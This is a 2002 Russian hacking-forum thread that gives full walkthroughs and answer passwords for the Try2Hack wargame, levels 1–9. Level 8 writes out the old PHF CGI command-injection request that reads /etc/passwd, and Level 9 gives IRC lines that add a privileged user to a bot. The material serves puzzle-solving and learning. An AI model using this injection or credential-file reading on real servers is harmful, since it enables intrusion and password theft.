BugTraq.Ru: форум / hacking / WALKTHROUGH уровни 1-9

информационная безопасность
без паники и всерьез

подробно о проекте

Анализ криптографических сетевых...

Модель надежности двухузлового...

Специальные марковские модели надежности...

Очередное исследование 19 миллиардов...

Оптимизация ввода-вывода как инструмент...

Зловреды выбирают Lisp и Delphi

bugtraq.ru / форум / hacking

Имя

Пароль

если вы видите этот текст, отключите в настройках форума использование JavaScript


ФОРУМ


	все доски
	FAQ
	IRC
	новые сообщения

	site updates
	guestbook
	beginners
	sysadmin
	programming
	operating systems
	theory
	web building
	software
	hardware
	networking
	law
	hacking
gadgets
job
dnet
humor
miscellaneous
scrap

регистрация

Легенда:

новое сообщение

закрытая нитка

новое сообщение

в закрытой нитке

старое сообщение

Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
Новичкам также крайне полезно ознакомиться с данным документом.

Walkthrough уровни 1-9 09.05.02 18:30 Число просмотров: 3145
Автор: :-) <:-)> Статус: Elderman

<"чистая" ссылка>

TRY2HACK WALKTHROUGH

by TechnoWolf, inSiDeR

Level 1: first go to the source code... then you should see the password...simple isnt it?

Level 2: go to notepad, make a html doc with the link to the flash program save it then
open it in a web browser. Then right click the link -> save the target as. open the the
file you saved in notepad. there is the username and password.

Level 3: Ok go to the temporary internet files. and look for a
file called JavaScript.txt open that file.The password is inside.

Level 4: go to the temporary internet files again. copy the file called level4.txt and paste
it on your desktop then open it. The Password should be there

Level 5: download the file on the site and then find a vb3 decompiler. Once you get one,
Decompile it and look at the source.

Level 6: download ethereal(a packet sniffer), if you are using windows you will need
WinPcap. Once you get that go to capture -> start change the interface to DLKRTS click ok
then try to login using the .exe file you downloaded with any username and password then
click stop on the packet sniffer. Find the file with the www.try2hack.nl in it the it should
say GET /p.lv6 on it some where go to http://www.try2hack.nl/p.lv6 and view the source. It
shows you the encrypted username and pass. you must decrypt it. this encryption type is
called baconian encryption.

A = aaaaa I/J = abaaa R = baaaa
B = aaaab K = abaab S = baaab
C = aaaba L = ababa T = baaba
D = aaabb M = ababb U/V = baabb
E = aabaa N = abbaa W = babaa
F = aabab O = abbab X = babab
G = aabba P = abbba Y = babba
H = aabbb Q = abbbb Z = babbb
there you go. figure out the user name and password.

Level 7:download secureCRT.after u do that connect to www.try2hack.nl using it. then typein
the following:

GET /cgi-bin/level7.pl HTTP/1.1
Connection: Keep_Alive
User-agent: MSIE 6.72 (UNIX)
Accept:/Referer: http://www.microsoft.com/ms.htm
Host: www.try2hack.nl
(Hit enter)
there you go onto level 8.

Level 8: Here you gotta use the old PHF bug:
http://www.try2hack.nl/cgi-bin/phf.cgi?Qalias=x%0a/bin/cat%20/etc/passwd
Read instructions now and enjoy lvl 9

Level 9: use ROT 13 translator to decrypt the text and base 64 to decrypt password for the channel #try2hack.level9
now decrypt the binary and here is the solution:

/ctcpreply LEVEL9-539 PING [adduser inSiDeR-w00t *!*insmod@a-ms3-11.tin.it]
/ctcpreply LEVEL9-539 PING [setuser inSiDeR-w00t HOSTS *!*insmod@a-ms3-11.tin.it]
/ctcpreply LEVEL9-539 PING [setuser inSiDeR-w00t PASS insider]
/ctcpreply LEVEL9-539 PING [chattr inSiDeR-w00t +mn]

Just replace bot name and info with your own.

THANKS TO: Shyam, Technowolf, inSiDeR and all the other ones.

---

Головоломка для хакера - Try2Hack 27.03.02 05:01
Автор: Renkvil <Boris> Статус: Member

<"чистая" ссылка>

Предлагаю вашему вниманию достатчно известный в западной хакерской сцене сайт из разряда "hack-it" aka "hacker competition"

http://www.try2hack.nl

Сайт предлагает 9 уровней сложности, разнообразные задания (JavaScript, Flash...) и не всегда тривиальные решения.

Решения можно постить нитками, пока dl не прибьёт thread :), или мне на мыло theboris@mail.ru

Если возникнет интерес, запостю ссылки на аналогичные ресурсы.

Борис aka Renkvil

Головоломка для хакера - Try2Hack

Это наверное единственный пост, который собрал столько просмотров..... уже почти 2200!!! Сильно... 14.05.02 12:11
Автор: DamNet <Denis Amelin> Статус: Elderman
Отредактировано 16.05.02 21:36 Количество правок: 1

<"чистая" ссылка>

На неделе надо будет запостить новую головоломку. 14.05.02 16:28
Автор: Renkvil <Boris> Статус: Member
Отредактировано 14.05.02 16:28 Количество правок: 1

<"чистая" ссылка>

Только просьба 15.05.02 22:20
Автор: Sir-G Статус: Незарегистрированный пользователь

<"чистая" ссылка>

не публиковать решения, по крайней мере первое время. Можно говорить до какого уровня дошел и делать небольшие подсказки.

уже ещё что-то нашёл? 14.05.02 16:43
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 14.05.02 16:44 Количество правок: 1

<"чистая" ссылка>

Действительно интересная игра. Затягивает... 14.05.02 16:05
Автор: fly4life <Александр Кузнецов> Статус: Elderman

<"чистая" ссылка>

level6: Народ, а какое всё же правильное название... 10.05.02 22:02
Автор: Renkvil <Boris> Статус: Member

<"чистая" ссылка>

...для "шифрования" на 6-ом уровне?
Начинается оно на вроде на "B", если верить указанной маске со "*".
Просто интересно стало!

Baconian (шифр Бэкона) 11.05.02 10:53
Автор: :-) <:-)> Статус: Elderman

<"чистая" ссылка>

Поиск по Google, один из первых: 11.05.02 22:22
Автор: Renkvil <Boris> Статус: Member

<"чистая" ссылка>

http://sherlock-holmes.org.uk/Radio/Radio_Plays/Non-Canon/Rathbone-Bruce/The_Baconian_Cipher/1946-05-27_The_Baconian_Cipher.mp3

Всё это давно уже не головоломка 09.05.02 18:40
Автор: zonny <Sasha> Статус: Member

<"чистая" ссылка>

Скоро наверно будет 10-й уровень 11.05.02 11:17
Автор: :-) <:-)> Статус: Elderman

<"чистая" ссылка>

[JuPiLeR] (автор 9-го) работает над ним...
Я 9-й прошел за 3 недели :-)) Тяжеловато, если до этого eggdrop не конфигурил.
IMHO 9-й там как-то глючно работает: сразу после добавления юзера нельзя сделать DCC chat с ботом, но где-то через час получается.

Интересно, кто ещё прошёл все уровни? 11.05.02 22:40
Автор: Renkvil <Boris> Статус: Member

<"чистая" ссылка>

Я до 6-ого дошёл, потом решение опубликовали..

А что же? :-)) 10.05.02 02:19
Автор: Renkvil <Boris> Статус: Member

<"чистая" ссылка>

Ну все ответы выкладываются, разве это интересно? 10.05.02 15:10
Автор: zonny <Sasha> Статус: Member

<"чистая" ссылка>

Ну все ответы выкладываются, разве это интересно? 10.05.02 19:53
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 10.05.02 19:55 Количество правок: 1

<"чистая" ссылка>

Модет это и не интересно, но их читать никто не заставляет. Я тож считал, что не интересно и не читал... пока не дошёл до четвёртого уровня ... а потом всё... потерял сон, аппетит... %))
Сам пройти не смог, скока я не геморроился, а узнать что дальше очень хотелось. =) Помогла подсказка из ответов

Да вобщем-то тоже самое, но азарт потерялся 10.05.02 20:05
Автор: zonny <Sasha> Статус: Member

<"чистая" ссылка>

Впринципе да... 10.05.02 20:10
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 10.05.02 20:14 Количество правок: 1

<"чистая" ссылка>

над остальными я уже так долго не геморроился, как над третьем и втором (всё-таки тянет немного глянуть =)), но... сдаётся мне, что без подсказок я бы не прошёл ни один из них =), а ты? ;)

Так не читай их. А до куда ты сам дошёл? 10.05.02 18:34
Автор: Renkvil <Boris> Статус: Member

<"чистая" ссылка>

Головоломка для хакера - Try2Hack -= решение всех уровней =- 18.04.02 00:03
Автор: VirX Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Рабочая неделя кончилась вот и решил заняться :

Level1
View HTML
Passwd : hackerzzz
Next level: levvel2.html
========================================================
Level2
смотрим хетемель
находим там ссылку на флеш и качаем файл FlashLevel2.swf

смотрим фаром и видим:

txtUsername –
Try2Hack I–
txtPassword –
NokiaIsGood Iќ ѓ LLeVeLL3.html

видим, что пароль и логин у нас
Username:Try2Hack
Password:NokiaIsGood
Next level:LLeVeLL3.html
========================================================
Level3
Долго парился не потому что сложно а потому что смотрел невнимательно :(
а там все просто - смотрим хтм и видим:
<SCRIPT src="JavaScript"></SCRIPT>
<SCRIPT language="JavaScript">
.........
качаем файл http://www.try2hack.nl/JavaScript а там видим:
-
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";
-
========================================================
Level4

Свиду показалось сложно т.к. я на знаю Java, но эт токо свиду
берем JavaDecompiller смотрим, что получилось
я юзал DJ Java Decompiller v2.9.9.61 by 2000 Atanas Neshkov прикольная прога
скачать мона отсюда: http://members.fortunecity.com/neshkov/dj.html
видим строчку:
-
infile = new String("level4");
-
http://www.try2hack.nl/level4
пробуем открыть и видим:
-
5_level_5.html
Try2Hack
AppletsAreEasy
-
логин : Try2Hack
пароль : AppletsAreEasy
и next level : 5_level_5.html

========================================================
Levek 5

Берем декомпилятор VB я скачал с http://dore.ru
видим примерно вот такую хрень

-
Const mc001A ="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~!_$#@()[]{}<\/>"
Const mc001E = "http://www.try2hack.f2s.com/login-level6.html"
Const mc0022 = " txtUsername=AlmostAHacker " |Обмануть хотели :)
Const mc0026 = " txtPassword=ZqrE01A2d " |

Sub cmdLogin_Click ()
Dim l003C As String
Dim l003E As Variant
If txtUsername <> Mid(mc001A, 56, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 35, 1) & Mid(mc001A, 3, 1) & Mid(mc001A, 44, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 13, 1) & Mid(mc001A, 21, 1) Then
MsgBox "Username not accepted."
Exit Sub
End If
If txtPassword <> Mid(mc001A, 51, 1) & Mid(mc001A, 31, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 51, 1) & Mid(mc001A, 16, 1) & Mid(mc001A, 45, 1) & Mid(mc001A, 24, 1) & Mid(mc001A, 29, 1) & Mid(mc001A, 26, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 25, 1) & Mid(mc001A, 24, 1) Then
MsgBox "Username/Password don't match."
Else
MsgBox "User logged in !"
l003C$ = Left$(mc001E, 28) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 32, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 7, 1) & Mid(mc001A, 63, 1) & Mid(mc001A, 18, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 23, 1) & Mid(mc001A, 22, 1)
MsgBox "For Windows NT / Windows 2000 users :" & Chr$(13) & Chr$(10) & Chr$(13) & Chr$(10) & l003C$
l003E = Shell("start " & l003C$)
End If
End Sub
-
хоть бейсика и не знаю, но интуитивно понято, что функция Mid возвращает символы из
строки а оператор '&' их склеивает. Пишим прогу на паскале (можно и самому подсчитать, но впадлу):
---
const
c : string ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~!_$#@()[]{}<\/>';
var
s : string;
begin
write('Username:');
s:=c[56]+c[28]+c[35]+c[3]+c[44]+c[11]+c[13]+c[21];
writeln(s);
write('Password:');
s:=c[51]+c[31]+c[30]+c[51]+c[16]+c[45]+c[24]+c[29]+c[26]+c[19]+c[28]+c[11]+c[30]+c[19]+c[25]+c[24];
writeln(s);
write('Next Level : http://www.try2hack.nl/');
s:=c[22]+c[67]+c[15]+c[67]+c[32]+c[67]+c[15]+c[67]+c[22]+c[67]+c[7]+c[63]+c[18]+c[30]+c[23]+c[22];
writeln(s);
end.
---
Компилим, запускаем и нам вываливает:
Username:Try2Hack
Password:OutOfInspiration
Next Level : http://www.try2hack.nl/l-e-v-e-l-6.html
=================
Level 6

Берем снифер. Я брал Ethernal. Снифаем и видим что идет GET запрос к файлу
http://www.try2hack.nl/p.lv6
там видим следующие:
---
(ENCRYPTION TYPE)
B*C*N**N

(USERNAME)
ababa abbab baaaa aaabb

(PASSWORD)
ababa aaaaa abbaa abbba aaaaa baaaa baaba babba

(PAGE)
ababa aabaa baabb aabaa ababa baaab aabaa baabb aabaa abbaa

---
L:LORD
P:LANPARTY
трейсить VB в сайсе квалификации не хватает :(
в криптографии не силен, но после долгих поисков была найдена данная ссылка:
http://tools.100mbit.nl/decrypt.php
---
=================
Level 7

После 6-го прямо халява :)

телнетимся на 80 порт сайта и скармливаем ему нечто типа
---
GET /cgi-bin/level7.pl HTTP/1.1
Accept:/
Referer: http://www.microsoft.com/ms.htm
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; UNIX/LINUX)
Host: www.try2hack.nl
Connection: Keep-Alive

---
и получаем следующие сообщение (теги выдрал):
Browser check : OK
OS check : OK
Link check : OK
Nextlevel : http://www.try2hack.nl/Level-8.html
Password for the messageboard is : TonyHawk2

===========
Level 8
Полная халява юзишь эксплоит и получаем пароль

http://www.try2hack.nl/cgi-bin/phf.cgi?Qalias=x%0a/bin/cat%20/etc/passwd

причем только Qalias хотя в некоторых багатрахах QALIAS
ну и рипером потом :)
L: BuiZe
P: arsanik

входим и получаем:
User "BuiZe" logged in.

New message for BuiZe :

Level 8 completed !
Go to irc.quakenet.org and join #try2hack
There type /msg bofh begin
===========
Level 9
так и не посмотрел у них на канале бот сдох уже давненько :(

ЗЫ: в принципе просто все кроме 6-го уровня (мне так показалось)

Кто-нибудь занимался девятым уровнем? 09.05.02 16:13
Автор: Sir-G Статус: Незарегистрированный пользователь

<"чистая" ссылка>

> найдена данная ссылка:
> http://tools.100mbit.nl/decrypt.php
Как же ты ее нашел:)) Я вот лично сам расшифровывал... И что значят магические строчки
(ENCRYPTION TYPE)
B*C*N**N
????

Че-то про 9-ый уровень не понял. Как называется бот, которого надо хачить?(вроде level-9, но такого нет) . К чему там был ключ, выданный ботом try2hack?

1 | 2 | 3 »

Page build time: 0 s

Design: Vadim Derkach